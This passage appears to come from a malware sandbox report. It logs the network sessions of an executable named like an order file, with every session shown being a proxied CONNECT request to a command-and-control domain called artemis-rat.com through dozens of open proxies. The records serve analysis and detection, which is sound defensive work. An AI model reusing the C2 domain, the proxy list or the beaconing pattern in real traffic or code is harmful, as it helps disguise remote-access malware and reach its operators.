                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.273416996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.273385048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.273128033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.273375034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.273219109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1783192.168.2.954654157.230.254.8831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.178253889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.998887062 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1784192.168.2.954532206.220.175.241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.267185926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1785192.168.2.9547041.32.57.8556787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.271095037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1786192.168.2.954005190.61.45.1579997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.271187067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445004940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445359945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.445195913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.538820982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.632508993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.632497072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.632584095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:51.773201942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1787192.168.2.951115192.169.205.131129197672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.286664009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445221901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445364952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1788192.168.2.951004161.97.173.78491457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.293023109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445214033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445359945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.445195913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.538820982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.632535934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.632565975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.632584095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:51.773390055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1789192.168.2.954894147.75.34.86100087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.296169043 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:51.600372076 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1790192.168.2.954969189.240.60.16990907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.304936886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.594743013 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1791192.168.2.95116692.204.135.37229427672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.312102079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1792192.168.2.954690117.160.250.130807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.315376997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.976680994 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1793192.168.2.954702112.5.33.1799997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.316652060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1794192.168.2.953961103.123.25.65807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.316818953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445225000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445362091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.445209026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.538750887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.632545948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.632577896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.632585049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1795192.168.2.954853182.106.220.25290917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.316921949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.659495115 CET325INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1796192.168.2.953965180.148.4.7480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.319094896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1797192.168.2.95483187.117.11.5710807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.323765039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1798192.168.2.95494952.151.210.20490007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.325119019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1799192.168.2.953862117.160.250.13388997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.325603008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.877176046 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1800192.168.2.955042195.25.20.10831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.325644970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.647881031 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1801192.168.2.954942188.164.193.178112517672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.325647116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445321083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445395947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.445322990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.538795948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.632535934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.632616043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.633446932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:51.773386955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
